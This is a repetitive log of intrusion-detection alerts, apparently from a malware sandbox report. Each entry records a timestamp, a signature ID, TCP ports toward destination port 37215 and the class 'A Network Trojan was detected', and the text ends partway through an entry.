                Timestamp:06/14/24-10:43:41.847881
                SID:2835222
                Source Port:36072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.110804
                SID:2835222
                Source Port:49132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.898031
                SID:2829579
                Source Port:49802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289123
                SID:2829579
                Source Port:59008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790310
                SID:2835222
                Source Port:53728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735080
                SID:2829579
                Source Port:36296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381161
                SID:2835222
                Source Port:54782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470877
                SID:2835222
                Source Port:44100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548173
                SID:2829579
                Source Port:35678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702475
                SID:2835222
                Source Port:44120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.941883
                SID:2835222
                Source Port:44308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763365
                SID:2829579
                Source Port:45628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421226
                SID:2835222
                Source Port:35764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807331
                SID:2829579
                Source Port:57208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198582
                SID:2829579
                Source Port:36374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.069691
                SID:2829579
                Source Port:36854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942329
                SID:2835222
                Source Port:59900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182925
                SID:2835222
                Source Port:53412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997432
                SID:2829579
                Source Port:55642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790036
                SID:2829579
                Source Port:34896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292709
                SID:2835222
                Source Port:56508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968681
                SID:2829579
                Source Port:60654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984831
                SID:2835222
                Source Port:33324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547702
                SID:2835222
                Source Port:45732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805425
                SID:2829579
                Source Port:37712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472522
                SID:2829579
                Source Port:34020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763524
                SID:2835222
                Source Port:57542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563869
                SID:2835222
                Source Port:41744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967438
                SID:2835222
                Source Port:51772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420663
                SID:2835222
                Source Port:56542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849228
                SID:2835222
                Source Port:41734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024796
                SID:2829579
                Source Port:45996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663341
                SID:2835222
                Source Port:39700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967230
                SID:2835222
                Source Port:49514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717947
                SID:2829579
                Source Port:56818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669746
                SID:2835222
                Source Port:43444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.092319
                SID:2835222
                Source Port:51872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.647017
                SID:2829579
                Source Port:44066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.542973
                SID:2835222
                Source Port:56920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.089885
                SID:2835222
                Source Port:35466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677530
                SID:2829579
                Source Port:43528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859729
                SID:2829579
                Source Port:33294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115322
                SID:2829579
                Source Port:33312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323400
                SID:2835222
                Source Port:52406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290162
                SID:2829579
                Source Port:50836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660444
                SID:2829579
                Source Port:48390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013765
                SID:2835222
                Source Port:57924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972013
                SID:2829579
                Source Port:41764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.083715
                SID:2829579
                Source Port:57848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.900048
                SID:2835222
                Source Port:47910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662725
                SID:2829579
                Source Port:48532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717746
                SID:2835222
                Source Port:55872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.092965
                SID:2835222
                Source Port:36968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339790
                SID:2835222
                Source Port:50172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763498
                SID:2835222
                Source Port:40340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368657
                SID:2835222
                Source Port:47400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342668
                SID:2835222
                Source Port:36008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012033
                SID:2829579
                Source Port:36064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023711
                SID:2835222
                Source Port:49786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014658
                SID:2829579
                Source Port:49842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848799
                SID:2835222
                Source Port:51016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986510
                SID:2829579
                Source Port:53138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849078
                SID:2829579
                Source Port:57778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.549517
                SID:2829579
                Source Port:56680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861159
                SID:2829579
                Source Port:58894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502983
                SID:2829579
                Source Port:36180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616281
                SID:2829579
                Source Port:55638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688742
                SID:2829579
                Source Port:40994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163549
                SID:2829579
                Source Port:39506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677263
                SID:2835222
                Source Port:58090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704232
                SID:2835222
                Source Port:37908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880343
                SID:2835222
                Source Port:41050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023096
                SID:2829579
                Source Port:50032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791388
                SID:2829579
                Source Port:39210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180948
                SID:2835222
                Source Port:53652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672683
                SID:2829579
                Source Port:36674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.941844
                SID:2829579
                Source Port:59682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056259
                SID:2829579
                Source Port:48138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806467
                SID:2835222
                Source Port:51752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472285
                SID:2835222
                Source Port:60048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568080
                SID:2829579
                Source Port:53008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520212
                SID:2835222
                Source Port:60926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677769
                SID:2829579
                Source Port:54864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053136
                SID:2829579
                Source Port:42834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917180
                SID:2835222
                Source Port:58392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702225
                SID:2829579
                Source Port:45128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846197
                SID:2829579
                Source Port:47390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324683
                SID:2835222
                Source Port:60716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717867
                SID:2835222
                Source Port:50406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859267
                SID:2829579
                Source Port:56324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014361
                SID:2835222
                Source Port:46338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.068895
                SID:2835222
                Source Port:34914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160368
                SID:2829579
                Source Port:47226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381847
                SID:2835222
                Source Port:53606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544168
                SID:2835222
                Source Port:55308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052026
                SID:2829579
                Source Port:53338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718024
                SID:2835222
                Source Port:52462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134056
                SID:2835222
                Source Port:57528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828891
                SID:2829579
                Source Port:42108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423808
                SID:2829579
                Source Port:59434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998615
                SID:2829579
                Source Port:57254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682060
                SID:2835222
                Source Port:49086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661651
                SID:2835222
                Source Port:35038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226563
                SID:2835222
                Source Port:44482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716269
                SID:2835222
                Source Port:37842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733530
                SID:2829579
                Source Port:35036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421355
                SID:2829579
                Source Port:35536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152662
                SID:2835222
                Source Port:49518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943300
                SID:2829579
                Source Port:44986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056504
                SID:2835222
                Source Port:55980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295359
                SID:2829579
                Source Port:55672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705370
                SID:2829579
                Source Port:48952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148426
                SID:2835222
                Source Port:52962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640556
                SID:2835222
                Source Port:42596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.022299
                SID:2829579
                Source Port:40926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703869
                SID:2835222
                Source Port:54934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618248
                SID:2835222
                Source Port:50214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805942
                SID:2835222
                Source Port:58062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881857
                SID:2829579
                Source Port:34716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944136
                SID:2835222
                Source Port:44416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671967
                SID:2835222
                Source Port:38440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568897
                SID:2835222
                Source Port:55788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291197
                SID:2835222
                Source Port:55898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934845
                SID:2835222
                Source Port:56198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977754
                SID:2835222
                Source Port:36528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.199081
                SID:2835222
                Source Port:60624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.686582
                SID:2829579
                Source Port:50816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669575
                SID:2835222
                Source Port:37264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341620
                SID:2835222
                Source Port:43516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.450928
                SID:2829579
                Source Port:58014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.569271
                SID:2829579
                Source Port:36524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073151
                SID:2835222
                Source Port:41598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614369
                SID:2829579
                Source Port:52650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805474
                SID:2835222
                Source Port:52800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504676
                SID:2829579
                Source Port:39744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879661
                SID:2829579
                Source Port:48358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321514
                SID:2835222
                Source Port:53146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.110947
                SID:2835222
                Source Port:39854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053337
                SID:2835222
                Source Port:47612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243753
                SID:2835222
                Source Port:34392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641138
                SID:2835222
                Source Port:53246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369123
                SID:2829579
                Source Port:37216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133207
                SID:2835222
                Source Port:34326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245947
                SID:2835222
                Source Port:59478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779929
                SID:2829579
                Source Port:38470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792336
                SID:2835222
                Source Port:46782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.685486
                SID:2835222
                Source Port:35496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.087747
                SID:2829579
                Source Port:56672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.337717
                SID:2829579
                Source Port:60378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027152
                SID:2829579
                Source Port:56512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181713
                SID:2829579
                Source Port:46654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183418
                SID:2835222
                Source Port:40578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383127
                SID:2829579
                Source Port:42136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471881
                SID:2829579
                Source Port:55520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979340
                SID:2829579
                Source Port:52016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409151
                SID:2835222
                Source Port:46470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978656
                SID:2829579
                Source Port:50638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.780013
                SID:2829579
                Source Port:59832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846918
                SID:2835222
                Source Port:39776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150854
                SID:2835222
                Source Port:37614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149592
                SID:2829579
                Source Port:40160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761745
                SID:2829579
                Source Port:37788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131772
                SID:2835222
                Source Port:41844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.788615
                SID:2835222
                Source Port:58838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546633
                SID:2829579
                Source Port:53746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503520
                SID:2829579
                Source Port:52552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028056
                SID:2835222
                Source Port:53372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073121
                SID:2829579
                Source Port:49934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.091285
                SID:2829579
                Source Port:48730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682392
                SID:2835222
                Source Port:53072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150471
                SID:2835222
                Source Port:42204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052423
                SID:2829579
                Source Port:34506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915263
                SID:2835222
                Source Port:43856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518710
                SID:2829579
                Source Port:60332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131258
                SID:2829579
                Source Port:54280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148303
                SID:2829579
                Source Port:52236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.045951
                SID:2829579
                Source Port:45758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980621
                SID:2829579
                Source Port:48610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383617
                SID:2835222
                Source Port:34690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517929
                SID:2829579
                Source Port:39116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182139
                SID:2829579
                Source Port:55426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470703
                SID:2835222
                Source Port:34790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028854
                SID:2835222
                Source Port:34118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369151
                SID:2829579
                Source Port:50650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019425
                SID:2835222
                Source Port:58352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341543
                SID:2835222
                Source Port:58758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940509
                SID:2835222
                Source Port:57214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849676
                SID:2835222
                Source Port:50038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860372
                SID:2829579
                Source Port:34944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020139
                SID:2829579
                Source Port:58912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791695
                SID:2835222
                Source Port:37478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027491
                SID:2829579
                Source Port:55326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202238
                SID:2835222
                Source Port:48998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.336602
                SID:2835222
                Source Port:35246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701468
                SID:2835222
                Source Port:56664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411319
                SID:2835222
                Source Port:43194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759351
                SID:2829579
                Source Port:50086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733202
